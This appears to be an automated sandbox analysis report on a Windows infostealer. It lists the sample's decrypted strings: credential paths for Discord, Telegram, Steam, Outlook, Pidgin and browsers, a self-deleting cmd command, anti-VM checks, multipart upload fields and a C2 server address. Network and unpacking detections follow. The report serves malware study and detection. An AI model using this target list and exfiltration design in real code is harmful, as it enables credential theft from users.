Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: - Local Time:
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: - UTC:
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: - Language:
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: - Keyboards:
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: - Laptop:
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: - Running Path:
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: - CPU:
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: - Threads:
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: - Cores:
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: - RAM:
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: - Display Resolution:
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: - GPU:
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: User Agents:
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: Installed Apps:
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: All Users:
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: Current User:
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: Process List:
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: system_info.txt
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: freebl3.dll
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: mozglue.dll
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: msvcp140.dll
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: nss3.dll
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: softokn3.dll
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: vcruntime140.dll
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: \Temp\
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: .exe
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: runas
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: open
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: /c start
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: %DESKTOP%
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: %APPDATA%
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: %LOCALAPPDATA%
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: %USERPROFILE%
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: %DOCUMENTS%
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: %PROGRAMFILES%
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: %PROGRAMFILES_86%
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: %RECENT%
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: *.lnk
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: files
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: \discord\
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: \Local Storage\leveldb\CURRENT
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: \Local Storage\leveldb
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: \Telegram Desktop\
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: key_datas
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: D877F783D5D3EF8C*
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: map*
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: A7FDF864FBC10B77*
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: A92DAA6EA6F891F2*
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: F8806DD0C461824F*
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: Telegram
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: Tox
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: *.tox
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: *.ini
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: Password
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: oftware\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: 00000001
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: 00000002
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: 00000003
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: 00000004
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: \Outlook\accounts.txt
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: Pidgin
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: \.purple\
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: accounts.xml
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: dQw4w9WgXcQ
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: token:
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: Software\Valve\Steam
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: SteamPath
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: \config\
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: ssfn*
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: config.vdf
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: DialogConfig.vdf
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: DialogConfigOverlay*.vdf
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: libraryfolders.vdf
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: loginusers.vdf
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: \Steam\
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: sqlite3.dll
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: browsers
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: done
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: soft
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: \Discord\tokens.txt
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: /c timeout /t 5 & del /f /q "
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: " & del "C:\ProgramData\*.dll"" & exit
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: C:\Windows\system32\cmd.exe
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: https
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: POST
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: HTTP/1.1
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: Content-Disposition: form-data; name="
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: hwid
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: build
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: token
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: file_name
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: file
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: message
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: screenshot.jpg
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: INSERT_KEY_HERE
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GetProcAddress
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: LoadLibraryA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: lstrcatA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: OpenEventA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: CreateEventA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: CloseHandle
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: Sleep
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GetUserDefaultLangID
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: VirtualAllocExNuma
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: VirtualFree
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GetSystemInfo
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: VirtualAlloc
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: HeapAlloc
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GetComputerNameA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: lstrcpyA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GetProcessHeap
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GetCurrentProcess
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: lstrlenA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: ExitProcess
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GlobalMemoryStatusEx
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GetSystemTime
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: SystemTimeToFileTime
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: advapi32.dll
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: gdi32.dll
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: user32.dll
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: crypt32.dll
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: ntdll.dll
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GetUserNameA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: CreateDCA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GetDeviceCaps
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: ReleaseDC
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: CryptStringToBinaryA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: sscanf
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: VMwareVMware
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: HAL9TH
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: JohnDoe
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: DISPLAY
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: %hu/%hu/%hu
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: http://85.28.47.31
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: silence
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: /5499d72b3a3e55be.php
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: /8405906461a5200c/
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: sila
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GetEnvironmentVariableA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GetFileAttributesA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GlobalLock
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: HeapFree
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GetFileSize
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GlobalSize
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: CreateToolhelp32Snapshot
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: IsWow64Process
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: Process32Next
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GetLocalTime
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: FreeLibrary
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GetTimeZoneInformation
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GetSystemPowerStatus
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GetVolumeInformationA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GetWindowsDirectoryA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: Process32First
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GetLocaleInfoA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GetUserDefaultLocaleName
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GetModuleFileNameA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: DeleteFileA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: FindNextFileA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: LocalFree
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: FindClose
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: SetEnvironmentVariableA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: LocalAlloc
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GetFileSizeEx
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: ReadFile
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: SetFilePointer
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: WriteFile
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: CreateFileA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: FindFirstFileA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: CopyFileA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: VirtualProtect
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GetLogicalProcessorInformationEx
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GetLastError
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: lstrcpynA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: MultiByteToWideChar
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GlobalFree
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: WideCharToMultiByte
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GlobalAlloc
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: OpenProcess
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: TerminateProcess
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GetCurrentProcessId
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: gdiplus.dll
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: ole32.dll
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: bcrypt.dll
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: wininet.dll
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: shlwapi.dll
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: shell32.dll
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: psapi.dll
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: rstrtmgr.dll
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: CreateCompatibleBitmap
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: SelectObject
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: BitBlt
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: DeleteObject
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: CreateCompatibleDC
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GdipGetImageEncodersSize
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GdipGetImageEncoders
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GdipCreateBitmapFromHBITMAP
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GdiplusStartup
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GdiplusShutdown
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GdipSaveImageToStream
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GdipDisposeImage
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GdipFree
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GetHGlobalFromStream
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: CreateStreamOnHGlobal
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: CoUninitialize
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: CoInitialize
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: CoCreateInstance
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: BCryptGenerateSymmetricKey
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: BCryptCloseAlgorithmProvider
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: BCryptDecrypt
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: BCryptSetProperty
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: BCryptDestroyKey
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: BCryptOpenAlgorithmProvider
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GetWindowRect
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GetDesktopWindow
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GetDC
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: CloseWindow
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: wsprintfA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: EnumDisplayDevicesA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GetKeyboardLayoutList
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: CharToOemW
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: wsprintfW
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: RegQueryValueExA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: RegEnumKeyExA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: RegOpenKeyExA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: RegCloseKey
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: RegEnumValueA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: CryptBinaryToStringA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: CryptUnprotectData
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: SHGetFolderPathA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: ShellExecuteExA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: InternetOpenUrlA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: InternetConnectA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: InternetCloseHandle
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: InternetOpenA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: HttpSendRequestA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: HttpOpenRequestA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: InternetReadFile
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: InternetCrackUrlA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: StrCmpCA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: StrStrA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: StrCmpCW
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00409BB0 CryptUnprotectData,LocalAlloc,memcpy,LocalFree, 0_2_00409BB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00418940 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA, 0_2_00418940
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040C660 memset,lstrlenA,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,memcpy,lstrcat,lstrcat,PK11_FreeSlot,lstrcat, 0_2_0040C660
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00407280 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree, 0_2_00407280
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00409B10 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree, 0_2_00409B10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB46C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer, 0_2_6CB46C80

Compliance
barindex
Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\1000002001\7ca32398cd.exe Unpacked PE file: 20.2.7ca32398cd.exe.400000.0.unpack
Source: C:\Users\user\1000003002\5aa32fec17.exe Unpacked PE file: 23.2.5aa32fec17.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\1000002001\7ca32398cd.exe Unpacked PE file: 37.2.7ca32398cd.exe.400000.0.unpack
Uses 32bit PE files
Source: file.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 173.222.162.64:443 -> 192.168.2.6:49717 version: TLS 1.0
Source: unknown HTTPS traffic detected: 192.168.2.6:49717 -> 173.222.162.64:443 version: TLS 1.0
Source: C:\Users\user\Desktop\file.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior
Source: unknown HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49711 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49712 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49720 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.126.32.68:443 -> 192.168.2.6:49721 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49737 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49767 version: TLS 1.2
Source: unknown HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.6:49815 version: TLS 1.2
Source: unknown HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.6:49815 version: TLS 1.2
Source: unknown HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.6:49823 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:49901 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49908 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.6:49931 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.6:49935 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:49965 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:49970 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:49972 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:49973 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.6:49975 version: TLS 1.2
Source: unknown HTTPS traffic detected: 143.204.215.18:443 -> 192.168.2.6:49976 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.6:49979 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:49981 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:49982 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:49984 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:49985 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:50002 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:50019 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:58880 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:58879 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:58877 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:58878 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:58881 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:58882 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:58884 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:58885 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:59072 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:49716 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:49714 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:49717 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:49718 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:49720 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:49719 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:49723 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:49725 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:49724 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49807 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.208.16.95:443 -> 192.168.2.6:49824 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:50071 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:50304 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:50301 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:50303 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:50300 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:50302 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:50305 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:50307 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:50308 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:50309 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:54094 version: TLS 1.2
Source: Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2447822341.000000006CBAD000.00000002.00000001.01000000.00000008.sdmp
